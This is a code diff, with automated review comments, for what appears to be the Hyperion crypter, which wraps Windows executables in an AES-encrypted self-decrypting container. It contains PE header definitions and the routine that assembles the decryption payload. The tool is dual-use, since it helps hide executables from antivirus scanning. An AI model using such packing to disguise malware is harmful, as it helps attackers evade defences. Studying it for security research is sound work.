+IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = 0200h
+IMAGE_DLLCHARACTERISTICS_NO_SEH = 0400h
+IMAGE_DLLCHARACTERISTICS_NO_BIND = 0800h
+IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 2000h
+IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 8000h
+
+IMAGE_DIRECTORY_ENTRY_EXPORT = 0
+IMAGE_DIRECTORY_ENTRY_IMPORT = 1
+IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
+IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3
+IMAGE_DIRECTORY_ENTRY_SECURITY = 4
+IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
+IMAGE_DIRECTORY_ENTRY_DEBUG = 6
+IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
+IMAGE_DIRECTORY_ENTRY_ARCHITECTURE = 7
+IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8
+IMAGE_DIRECTORY_ENTRY_TLS = 9
+IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
+IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT = 11
+IMAGE_DIRECTORY_ENTRY_IAT = 12
+IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13
+IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
+
+IMAGE_SIZEOF_SECTION_HEADER = 40
+
+IMAGE_SCN_TYPE_NO_PAD = 00000008h
+IMAGE_SCN_CNT_CODE = 00000020h
+IMAGE_SCN_CNT_INITIALIZED_DATA = 00000040h
+IMAGE_SCN_CNT_UNINITIALIZED_DATA = 00000080h
+IMAGE_SCN_LNK_OTHER = 00000100h
+IMAGE_SCN_LNK_INFO = 00000200h
+IMAGE_SCN_LNK_REMOVE = 00000800h
+IMAGE_SCN_LNK_COMDAT = 00001000h
+IMAGE_SCN_NO_DEFER_SPEC_EXC = 00004000h
+IMAGE_SCN_GPREL = 00008000h
+IMAGE_SCN_MEM_FARDATA = 00008000h
+IMAGE_SCN_MEM_PURGEABLE = 00020000h
+IMAGE_SCN_MEM_16BIT = 00020000h
+IMAGE_SCN_MEM_LOCKED = 00040000h
+IMAGE_SCN_MEM_PRELOAD = 00080000h
+IMAGE_SCN_ALIGN_1BYTES = 00100000h
+IMAGE_SCN_ALIGN_2BYTES = 00200000h
+IMAGE_SCN_ALIGN_4BYTES = 00300000h
+IMAGE_SCN_ALIGN_8BYTES = 00400000h
+IMAGE_SCN_ALIGN_16BYTES = 00500000h
+IMAGE_SCN_ALIGN_32BYTES = 00600000h
+IMAGE_SCN_ALIGN_64BYTES = 00700000h
+IMAGE_SCN_ALIGN_128BYTES = 00800000h
+IMAGE_SCN_ALIGN_256BYTES = 00900000h
+IMAGE_SCN_ALIGN_512BYTES = 00A00000h
+IMAGE_SCN_ALIGN_1024BYTES = 00B00000h
+IMAGE_SCN_ALIGN_2048BYTES = 00C00000h
+IMAGE_SCN_ALIGN_4096BYTES = 00D00000h
+IMAGE_SCN_ALIGN_8192BYTES = 00E00000h
+IMAGE_SCN_LNK_NRELOC_OVFL = 01000000h
+IMAGE_SCN_MEM_DISCARDABLE = 02000000h
+IMAGE_SCN_MEM_NOT_CACHED = 04000000h
+IMAGE_SCN_MEM_NOT_PAGED = 08000000h
+IMAGE_SCN_MEM_SHARED = 10000000h
+IMAGE_SCN_MEM_EXECUTE = 20000000h
+IMAGE_SCN_MEM_READ = 40000000h
+IMAGE_SCN_MEM_WRITE = 80000000h
+IMAGE_SCN_SCALE_INDEX = 00000001h
+
+struct IMAGE_DOS_HEADER
+ e_magic dw ?
+ e_cblp dw ?
+ e_cp dw ?
+ e_crlc dw ?
+ e_cparhdr dw ?
+ e_minalloc dw ?
+ e_maxalloc dw ?
+ e_ss dw ?
+ e_sp dw ?
+ e_csum dw ?
+ e_ip dw ?
+ e_cs dw ?
+ e_lfarlc dw ?
+ e_ovno dw ?
+ e_res rw 4
+ e_oemid dw ?
+ e_oeminfo dw ?
+ e_res2 rw 10
+ e_lfanew dd ?
+ends
+
+struct IMAGE_FILE_HEADER
+ Machine dw ?
+ NumberOfSections dw ?
+ TimeDateStamp dd ?
+ PointerToSymbolTable dd ?
+ NumberOfSymbols dd ?
+ SizeOfOptionalHeader dw ?
+ Characteristics dw ?
+ends
+
+struct IMAGE_DATA_DIRECTORY
+ VirtualAddress dd ?
+ isize dd ?
+ends
+
+IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
+
+struct IMAGE_OPTIONAL_HEADER64
+ Magic dw ?
+ MajorLinkerVersion db ?
+ MinorLinkerVersion db ?
+ SizeOfCode dd ?
+ SizeOfInitializedData dd ?
+ SizeOfUninitializedData dd ?
+ AddressOfEntryPoint dd ?
+ BaseOfCode dd ?
+
+ ImageBase dq ?
+ SectionAlignment dd ?
+ FileAlignment dd ?
+ MajorOperatingSystemVersion dw ?
+ MinorOperatingSystemVersion dw ?
+ MajorImageVersion dw ?
+ MinorImageVersion dw ?
+ MajorSubsystemVersion dw ?
+ MinorSubsystemVersion dw ?
+ Win32VersionValue dd ?
+ SizeOfImage dd ?
+ SizeOfHeaders dd ?
+ CheckSum dd ?
+ Subsystem dw ?
+ DllCharacteristics dw ?
+ SizeOfStackReserve dq ?
+ SizeOfStackCommit dq ?
+ SizeOfHeapReserve dq ?
+ SizeOfHeapCommit dq ?
+ LoaderFlags dd ?
+ NumberOfRvaAndSizes dd ?
+
+ DataDirectory rb (sizeof.IMAGE_DATA_DIRECTORY*IMAGE_NUMBEROF_DIRECTORY_ENTRIES)
+ends
+
+struct IMAGE_NT_HEADERS64
+ Signature dd ?
+ FileHeader IMAGE_FILE_HEADER ?
+ OptionalHeader IMAGE_OPTIONAL_HEADER64 ?
+ends
+
+IMAGE_SIZEOF_SHORT_NAME = 8
+
+struct IMAGE_SECTION_HEADER
+ _Name db IMAGE_SIZEOF_SHORT_NAME dup (?)
+ union
+ PhysicalAddress dd ?
+ VirtualSize dd ?
+ ends
+ VirtualAddress dd ?
+ SizeOfRawData dd ?
+ PointerToRawData dd ?
+ PointerToRelocations dd ?
+ PointerToLinenumbers dd ?
+ NumberOfRelocations dw ?
+ NumberOfLinenumbers dw ?
+ Characteristics dd ?
+ends
+
+struct IMAGE_IMPORT_DESCRIPTOR
+ union
+ Characteristics dd ?
+ OriginalFirstThunk dd ?
+ ends
+ TimeDateStamp dd ?
+ ForwarderChain dd ?
+ Name_ dd ?
+ FirstThunk dd ?
+ends
+
+struct IMAGE_IMPORT_BY_NAME
+ Hint dw ?
+ Name_ rb 1
+ends
+
+IMAGE_ORDINAL_FLAG64 = 8000000000000000h
diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.cbp b/binary/hyperion/source/Src/Crypter/Hyperion.cbp
deleted file mode 100644
index 2bd0787..0000000
--- a/binary/hyperion/source/Src/Crypter/Hyperion.cbp
+++ /dev/null
@@ -1,70 +0,0 @@
-
-
-
-
-
-
diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.depend b/binary/hyperion/source/Src/Crypter/Hyperion.depend
deleted file mode 100644
index 7b56452..0000000
--- a/binary/hyperion/source/Src/Crypter/Hyperion.depend
+++ /dev/null
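Review bot: The header only carries the 32-bit optional-header constants (`IMAGE_SIZEOF_NT_OPTIONAL32_HEADER = 224`, `IMAGE_NT_OPTIONAL_HDR32_MAGIC = 10bh`) although every structure in it is the 64-bit layout (`IMAGE_OPTIONAL_HEADER64`, `IMAGE_NT_HEADERS64`, `IMAGE_ORDINAL_FLAG64`); a PE32+ validity check needs the 64-bit magic, so `IMAGE_NT_OPTIONAL_HDR64_MAGIC = 20Bh` and `IMAGE_SIZEOF_NT_OPTIONAL64_HEADER = 240` belong next to them, or the 32-bit pair should be dropped if this container never inspects `Magic`. Whether the verify routine in `loadexecutable.asm` compares the magic at all is not visible from this file. A one-line header comment stating that the layouts are the PE32+ ones from winnt.h (and that `isize`/`Name_`/`_Name` are renamed only to avoid fasm keyword clashes, if that is the reason) would help readers who diff it against the 32-bit container's copy.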
@@ -1,453 +0,0 @@ -# depslib dependency file v1.0 -1307313232 source:e:\projects\hyperion\main.cpp - - - "pe.h" - "fileaccess.h" - "peanalysis.h" - "patchcontainer.h" - -1304981796 e:\projects\hyperion\pe.h - "fileaccess.h" - "stdint.h" - -1304981762 source:e:\projects\hyperion\pe.cpp - "pe.h" - - - -1304031132 e:\projects\hyperion\fileaccess.h - "stdint.h" - -1304031532 source:e:\projects\hyperion\fileaccess.cpp - - - "fileaccess.h" - -1305067543 source:e:\projects\hyperion\encryptdata.cpp - - - "encryptdata.h" - "fileaccess.h" - -1307307991 e:\projects\hyperion\encryptdata.h - "pe.h" - - -1307311722 source:e:\projects\hyperion\peanalysis.cpp - - - "peanalysis.h" - "fileaccess.h" - -1307311805 e:\projects\hyperion\peanalysis.h - "pe.h" - - -1307313263 e:\projects\hyperion\patchcontainer.h - "peanalysis.h" - -1307313258 source:e:\projects\hyperion\patchcontainer.cpp - "patchcontainer.h" - "peanalysis.h" - -1307313232 source:f:\projects\hyperion\main.cpp - - - "pe.h" - "fileaccess.h" - "peanalysis.h" - "patchcontainer.h" - -1304981796 f:\projects\hyperion\pe.h - "fileaccess.h" - "stdint.h" - -1304031132 f:\projects\hyperion\fileaccess.h - "stdint.h" - -1307311805 f:\projects\hyperion\peanalysis.h - "pe.h" - - -1307313263 f:\projects\hyperion\patchcontainer.h - "peanalysis.h" - -1307313258 source:f:\projects\hyperion\patchcontainer.cpp - "patchcontainer.h" - "peanalysis.h" - -1304981762 source:f:\projects\hyperion\pe.cpp - "pe.h" - - - -1307311722 source:f:\projects\hyperion\peanalysis.cpp - - - "peanalysis.h" - "fileaccess.h" - -1304031532 source:f:\projects\hyperion\fileaccess.cpp - - - "fileaccess.h" - -1304978162 source:f:\projects\hyperion\crypter\pe.cpp - "pe.h" - - - -1315062595 f:\projects\hyperion\crypter\pe.h - "fileaccess.h" - "stdint.h" - -1311888507 f:\projects\hyperion\crypter\fileaccess.h - "stdint.h" - -1315062622 source:f:\projects\hyperion\crypter\peanalysis.cpp - - - - "peanalysis.h" - "fileaccess.h" - -1311624287 
f:\projects\hyperion\crypter\peanalysis.h - "pe.h" - - -1311888499 source:f:\projects\hyperion\crypter\fileaccess.cpp - - - "fileaccess.h" - -1315743893 source:f:\projects\hyperion\crypter\main.cpp - - - - - "pe.h" - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1307884947 f:\projects\hyperion\crypter\patchcontainer.h - "peanalysis.h" - "createoutput.h" - -1307880669 source:f:\projects\hyperion\crypter\patchcontainer.cpp - - - "patchcontainer.h" - "peanalysis.h" - -1315746584 source:f:\projects\hyperion\crypter\createoutput.cpp - - - - - - "createoutput.h" - -1315762470 f:\projects\hyperion\crypter\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1311892099 source:f:\projects\hyperion\crypter2\fileaccess.cpp - - - "fileaccess.h" - -1311892107 f:\projects\hyperion\crypter2\fileaccess.h - "stdint.h" - -1304981762 source:f:\projects\hyperion\crypter2\pe.cpp - "pe.h" - - - -1307873664 f:\projects\hyperion\crypter2\pe.h - "fileaccess.h" - "stdint.h" - -1311628075 source:f:\projects\hyperion\crypter2\peanalysis.cpp - - - "peanalysis.h" - "fileaccess.h" - -1311627887 f:\projects\hyperion\crypter2\peanalysis.h - "pe.h" - - -1312233679 source:f:\projects\hyperion\crypter2\createoutput.cpp - - - - - "createoutput.h" - -1312233317 f:\projects\hyperion\crypter2\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1312234002 source:f:\projects\hyperion\crypter2\main.cpp - - - "pe.h" - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1307884947 f:\projects\hyperion\crypter2\patchcontainer.h - "peanalysis.h" - "createoutput.h" - -1311511420 source:f:\projects\hyperion\crypter2\patchcontainer.cpp - - - "patchcontainer.h" - "peanalysis.h" - -1311892099 source:f:\projects\hyperion\src\crypter\fileaccess.cpp - - - "fileaccess.h" - -1311892107 f:\projects\hyperion\src\crypter\fileaccess.h - "stdint.h" - -1331056347 source:f:\projects\hyperion\src\crypter\main.cpp - - - - - "pe.h" - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1331055330 
f:\projects\hyperion\src\crypter\pe.h - "fileaccess.h" - "stdint.h" - -1331055401 f:\projects\hyperion\src\crypter\peanalysis.h - "pe.h" - - -1333110943 f:\projects\hyperion\src\crypter\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1304981762 source:f:\projects\hyperion\src\crypter\pe.cpp - "pe.h" - - - -1331055659 source:f:\projects\hyperion\src\crypter\peanalysis.cpp - - - - "peanalysis.h" - "fileaccess.h" - -1333102984 source:f:\projects\hyperion\src\crypter\createoutput.cpp - - - - - - - - "createoutput.h" - -1333289160 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\fileaccess.cpp - - - "fileaccess.h" - -1311892080 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\fileaccess.h - "stdint.h" - -1398035481 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\main.cpp - - - - - "pe.h" - "hyperion.h" - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1331055300 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\pe.h - "fileaccess.h" - "stdint.h" - -1331055360 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\peanalysis.h - "pe.h" - - -1398035359 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1304981760 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\pe.cpp - "pe.h" - - - -1331055660 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\peanalysis.cpp - - - - "peanalysis.h" - "fileaccess.h" - -1398035443 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\hyperion.h - -1398035351 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\createoutput.cpp - - - - - - - - "hyperion.h" - "createoutput.h" - -1398035805 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\hyperion.cpp - - - - - "pe.h" - "hyperion.h" - 
"fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1398199681 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\fileaccess.cpp - - - "fileaccess.h" - -1311892080 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\fileaccess.h - "stdint.h" - -1398199814 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\pe.cpp - "pe.h" - - - -1331055300 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\pe.h - "fileaccess.h" - "stdint.h" - -1398199530 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\peanalysis.cpp - - - - "peanalysis.h" - "fileaccess.h" - -1331055360 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\peanalysis.h - "pe.h" - - -1398199114 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\createoutput.cpp - - - - - - - - "hyperion.h" - "createoutput.h" - -1398035443 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\hyperion.h - -1398187336 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1398198609 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\hyperion.cpp - - - - - "pe.h" - "hyperion.h" - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - -1398714768 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\fileaccess.cpp - - - "fileaccess.h" - "ostreamlog.h" - -1311892080 c:\users\belial\desktop\hyperion-1.1\src\crypter\fileaccess.h - "stdint.h" - -1398715396 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\pe.cpp - - - "pe.h" - "ostreamlog.h" - -1331055300 c:\users\belial\desktop\hyperion-1.1\src\crypter\pe.h - "fileaccess.h" - "stdint.h" - -1398715479 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\peanalysis.cpp - - - - "peanalysis.h" - "fileaccess.h" - "ostreamlog.h" - -1331055360 
c:\users\belial\desktop\hyperion-1.1\src\crypter\peanalysis.h - "pe.h" - - -1399578000 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\createoutput.cpp - - - - - - - - "hyperion.h" - "createoutput.h" - -1399577979 c:\users\belial\desktop\hyperion-1.1\src\crypter\hyperion.h - "fileaccess.h" - "peanalysis.h" - "createoutput.h" - "pe.h" - "ostreamlog.h" - -1399578190 c:\users\belial\desktop\hyperion-1.1\src\crypter\createoutput.h - "fileaccess.h" - "peanalysis.h" - -1398712059 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\hyperion.cpp - - - - - "hyperion.h" - -1398715238 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\ostreamlog.cpp - "ostreamlog.h" - - -1398715303 c:\users\belial\desktop\hyperion-1.1\src\crypter\ostreamlog.h - - diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.layout b/binary/hyperion/source/Src/Crypter/Hyperion.layout deleted file mode 100644 index 71abd34..0000000 --- a/binary/hyperion/source/Src/Crypter/Hyperion.layout +++ /dev/null @@ -1,64 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/binary/hyperion/source/Src/Crypter/aes.c b/binary/hyperion/source/Src/Crypter/aes.c new file mode 100644 index 0000000..9ffa001 --- /dev/null +++ b/binary/hyperion/source/Src/Crypter/aes.c 
@@ -0,0 +1,53 @@
+#include "hyperion.h"
+#include "fasmoutput.h"
+
+//include '..\..\Payloads\Aes\32\aes.inc'
+//include '..\..\Payloads\Aes\32\aes.asm'
+//include '..\..\Payloads\Aes\32\decryptexecutable.asm'
+
+BOOL decryptAES(BOOL pe32){
+ const char* payload_directory;
+ const char* container_directory;
+
+ //select destination paths
+ if(pe32){
+ payload_directory = PAYLOAD32_AES_DIR;
+ container_directory = CONTAINER32_DIR;
+ }
+ else{
+ payload_directory = PAYLOAD64_AES_DIR;
+ container_directory = CONTAINER64_DIR;
+ }
+
+ //create file names
+ char aes_inc[MAX_CHAR_SIZE];
+ aes_inc[0] = 0;
+ strlcat(aes_inc, payload_directory, MAX_CHAR_SIZE);
+ strlcat(aes_inc, AES_INC_FILENAME, MAX_CHAR_SIZE);
+
+ char aes_asm[MAX_CHAR_SIZE];
+ aes_asm[0] = 0;
+ strlcat(aes_asm, payload_directory, MAX_CHAR_SIZE);
+ strlcat(aes_asm, AES_ASM_FILENAME, MAX_CHAR_SIZE);
+
+ char decrypter_asm[MAX_CHAR_SIZE];
+ decrypter_asm[0] = 0;
+ strlcat(decrypter_asm, payload_directory, MAX_CHAR_SIZE);
+ strlcat(decrypter_asm, AES_DECRYPTION_FILENAME, MAX_CHAR_SIZE);
+
+ //create include file to use aes algorithm
+ if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_inc, FALSE))
+ {
+ return FALSE;
+ }
+ if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_asm, TRUE))
+ {
+ return FALSE;
+ }
+ if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, decrypter_asm, TRUE))
+ {
+ return FALSE;
+ }
+
+ return TRUE;
+}
diff --git a/binary/hyperion/source/Src/Crypter/createoutput.cpp b/binary/hyperion/source/Src/Crypter/createoutput.cpp
deleted file mode 100644
index 6f69be2..0000000
--- a/binary/hyperion/source/Src/Crypter/createoutput.cpp
+++ /dev/null
@@ -1,312 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#include "hyperion.h"
-#include "createoutput.h"
-
-using namespace std;
-using namespace hyperion;
-
-extern OstreamLog ostreamlog;
-
-namespace hyperion{
-
- /**
- * Declares a FASM constant
- * Output: "
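Review bot: The `strlcat` return values in `decryptAES` are discarded, so when `payload_directory` plus a filename exceeds `MAX_CHAR_SIZE` the truncated path is silently handed to `fasmInclude` and the generated `decryption_payload.asm` ends up including a nonexistent (or wrong) file; assuming the BSD semantics where a result `>= size` means truncation, each concatenation should be checked and the function should return FALSE on overflow. The three buffers are built with identical four-line sequences, which is exactly where such a check gets dropped — a small static helper that builds one path and reports truncation removes the duplication. The commented-out `//include '..\..\Payloads\Aes\32\…'` lines at the top look like stale notes on what the emitted file will contain and would be clearer as a one-line comment above the `fasmInclude` calls.

```c
/* Builds dir+name into dst; returns FALSE if the result did not fit in MAX_CHAR_SIZE. */
static BOOL buildPayloadPath(char* dst, const char* dir, const char* name){
    dst[0] = 0;
    if(strlcat(dst, dir, MAX_CHAR_SIZE) >= MAX_CHAR_SIZE) return FALSE;
    if(strlcat(dst, name, MAX_CHAR_SIZE) >= MAX_CHAR_SIZE) return FALSE;
    return TRUE;
}

BOOL decryptAES(BOOL pe32){
    // … unchanged: payload/container directory selection …

    //create file names; a truncated path must not reach fasmInclude
    char aes_inc[MAX_CHAR_SIZE];
    char aes_asm[MAX_CHAR_SIZE];
    char decrypter_asm[MAX_CHAR_SIZE];
    if(!buildPayloadPath(aes_inc, payload_directory, AES_INC_FILENAME) ||
       !buildPayloadPath(aes_asm, payload_directory, AES_ASM_FILENAME) ||
       !buildPayloadPath(decrypter_asm, payload_directory, AES_DECRYPTION_FILENAME)){
        return FALSE;
    }

    // … unchanged: the three fasmInclude calls and return TRUE …
}
```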